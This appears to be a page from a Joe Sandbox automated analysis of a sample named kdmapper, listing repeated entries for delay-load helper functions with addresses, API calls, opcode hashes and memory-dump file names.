Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fd286f318e49c0e138d5803a079f213ddf548188f7049619b48a8a542c8c3123
Instruction ID: ab943779499fc474109054fb3359a991290fbb303154d4227dc7bf3fc812595b
Opcode Fuzzy Hash: fd286f318e49c0e138d5803a079f213ddf548188f7049619b48a8a542c8c3123
Instruction Fuzzy Hash: 3FB012F1299344BC311461172C03C37030DC0C1F20331D13EFD06D0190D840ED400471

Function 00DFE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 89e96ea90aaa49476c056a18202363122990bfb2e663008cebb04dbaa33a83ca
Instruction ID: be1ec98b09c599b59dc0f2b153019f5ac62011b90ad385af5c312accf344e6eb
Opcode Fuzzy Hash: 89e96ea90aaa49476c056a18202363122990bfb2e663008cebb04dbaa33a83ca
Instruction Fuzzy Hash: 51B012E1299304AC311462162D03C37430DC0C0B20331D13EF906D0290DC50AD490471

Function 00DFE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 022e6b213762573997fa03792102b39a7cb9f16dfb1e8a1cc1ba82fcbe0539f1
Instruction ID: 980bcd820b46b97dff9b7a98941c6e5ab8929e9646910da56eb3757f0115ef86
Opcode Fuzzy Hash: 022e6b213762573997fa03792102b39a7cb9f16dfb1e8a1cc1ba82fcbe0539f1
Instruction Fuzzy Hash: 08B012E1399344BC315462162C03C37030DC0C0B20331D63EF906D0290D840AC840471

Function 00DFE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0311912091abf9ed099cff9d3746b2aee9c5a294152c1bea9759f8294a3c30e3
Instruction ID: 0a6f3a86d1658b228e042ec3e1c17d290179fe84630efad5143dde2a192ab504
Opcode Fuzzy Hash: 0311912091abf9ed099cff9d3746b2aee9c5a294152c1bea9759f8294a3c30e3
Instruction Fuzzy Hash: 0CB012F1299304AC311461172C03C37430DC0C0F20331D03EF906D0191D840AD400471

Function 00DFE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a61d11c6936959e72300907bae8d46d0a130c4d756a22ece6c044a44521a76ae
Instruction ID: 88003e49b80df450798b40114452f38cad500d7704772ac9f0acebca35759a7a
Opcode Fuzzy Hash: a61d11c6936959e72300907bae8d46d0a130c4d756a22ece6c044a44521a76ae
Instruction Fuzzy Hash: 94B012F1299304AC311461172D03C37430DC0C0F20331D03EF906D0190DC40AE410471

Function 00DFE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4b5eea86a4ae2134484289feddb65abcb1c2b8f916835656a3398165217d4e7f
Instruction ID: a00d248028544714be975a602a3ccc849c7211649a22c68f0765e32d5387d126
Opcode Fuzzy Hash: 4b5eea86a4ae2134484289feddb65abcb1c2b8f916835656a3398165217d4e7f
Instruction Fuzzy Hash: 20B012F1299304BC315461172C03C37030DC0C0F20331D13EF906D0190D840AD800471

Function 00DFE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2105dc7726a9c28d970a4856cbf9cf42c109c12b651944ecc5e23e6bc23d2b35
Instruction ID: a1b82e12961a36852fc21a68b68f9a7ac7712edc754266c80a528f36ae8980dc
Opcode Fuzzy Hash: 2105dc7726a9c28d970a4856cbf9cf42c109c12b651944ecc5e23e6bc23d2b35
Instruction Fuzzy Hash: 67B012F1298384FC3108E1142C07C3B038CC0C0F21332E22EFA05E1090D8408C440473

Function 00DFE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3561d766e2d53bf4405c5620afc7504112890d277ed1d228151331b146a90ab0
Instruction ID: 6d24ae51163ef5d105e79c0f9d9c2dfdc643be1a658b8b81ab826b64806519aa
Opcode Fuzzy Hash: 3561d766e2d53bf4405c5620afc7504112890d277ed1d228151331b146a90ab0
Instruction Fuzzy Hash: 00B012F1298394BC3208A1142D07C7B434CC0C0F21332E22EF705E1090D8404C490473

Function 00DFE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 701fe1dd84edf85fa0f33c59bfe8f60167523cb81f1f908db2706c761c0d00b0
Instruction ID: ba3c814bd144b17bfcc45a61caa89cad00a1fd7582b6ffc9a8efcd6e665e0a56
Opcode Fuzzy Hash: 701fe1dd84edf85fa0f33c59bfe8f60167523cb81f1f908db2706c761c0d00b0
Instruction Fuzzy Hash: 5BB012F1298384FC3108A1152C07C3B034CC0C0F21332E22EF905E1090D8408E400473

Function 00DFE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE580

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8e9142e7812e14db55140c68a457e285a9258066125d884943f92fa8712d8e80
Instruction ID: 3a0f26a4c41a2d6d9137fa5f86926e99d2470e43e0bcdfec833034c9160caad9
Opcode Fuzzy Hash: 8e9142e7812e14db55140c68a457e285a9258066125d884943f92fa8712d8e80
Instruction Fuzzy Hash: 39B012D169D31C7D310861643C03C37030CC0C0F20332E02EF505D5690E8404C800471

Function 00DFE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE580

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c14f9b6ee79536bc86fa45306a2853ef6ed9546bd3f022daa7ce066f4941cc42
Instruction ID: a1e650ed93185bb344fa34095d982ad33a6f50453936c386d7d3643f083b98be
Opcode Fuzzy Hash: c14f9b6ee79536bc86fa45306a2853ef6ed9546bd3f022daa7ce066f4941cc42
Instruction Fuzzy Hash: 44B012D129D3187C314461647C03C37031CC0C0F20332E22EF505D5290E8404CC00471

Function 00DFE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE580

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5d29eb46ff9678fad018827ce7d2a1fc341a982ae44f3100a7c66a3bb853f6e4
Instruction ID: 0a29b3b08c21a59bda391755cc8f44aa89a71b912e8f0e1c1bf2afdd9a80cb71
Opcode Fuzzy Hash: 5d29eb46ff9678fad018827ce7d2a1fc341a982ae44f3100a7c66a3bb853f6e4
Instruction Fuzzy Hash: 0DB012D129D3187C310461647D03C37031CC0C0F20332E22EF505D5290EC404D810471

Function 00DFE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cc3bab7e9826416a9d15e4b8c3f8a5556a10897208e50a181878e14df570aed9
Instruction ID: ac1615acb00cfb2e455e8855215c8b2395eac15b61d70c6bd2c7547449ada9aa
Opcode Fuzzy Hash: cc3bab7e9826416a9d15e4b8c3f8a5556a10897208e50a181878e14df570aed9
Instruction Fuzzy Hash: 12B012D16993047C320461186C03C3B030CC0C1F20331E32EF515D0191E8404C840471

Function 00DFE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6f80ed3f215fe158be4720bc575888d8e5502cb2239bd0b891840560a97adcf1
Instruction ID: 884204ca9350b54accca05da67a46e157abdb00db0da84427ce673a0b8973d3a
Opcode Fuzzy Hash: 6f80ed3f215fe158be4720bc575888d8e5502cb2239bd0b891840560a97adcf1
Instruction Fuzzy Hash: 80B012D16992047C310421342C07C3B030DC4C1F20331E13EF561E0492E8404D440471

Function 00DFE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0c1de9503e8cf192498b5c460ec7786f4bfd813188516e9b822b4ab19d9b8622
Instruction ID: df9207e707744cb2d4945276d7ba8dcab0e3afbd530d3630ea26def6398965f2
Opcode Fuzzy Hash: 0c1de9503e8cf192498b5c460ec7786f4bfd813188516e9b822b4ab19d9b8622
Instruction Fuzzy Hash: 97B012D1A992047D310861182C03D3B030CC0C1F20331E12EF515D0591E8804C400471

Function 00DFE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7e704f01d6c09944fc64c49c8e1ad60e536386db7909e632b72ca71969174674
Instruction ID: e77677969b1fec4c203848c667badf6f06ed80ac6072703ff65a2bcb2db9994b
Opcode Fuzzy Hash: 7e704f01d6c09944fc64c49c8e1ad60e536386db7909e632b72ca71969174674
Instruction Fuzzy Hash: ECB012D1A992447C320861182D03C3B070CC0C1F20331E12EF615D0591E8804C410471

Function 00DFE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2a29507cf884df64e16842f2b85dac85d87b462f96962e84dc223a1944cbb330
Instruction ID: 4a38024f01207f17b39d77bb437e8f4d4388a56331cd6a37e7ef6492e20341e7
Opcode Fuzzy Hash: 2a29507cf884df64e16842f2b85dac85d87b462f96962e84dc223a1944cbb330
Instruction Fuzzy Hash: A7A001E66A934ABC312866526D06C7B431EC4C5BA1332D92EFA57D44A1A890A88518B1

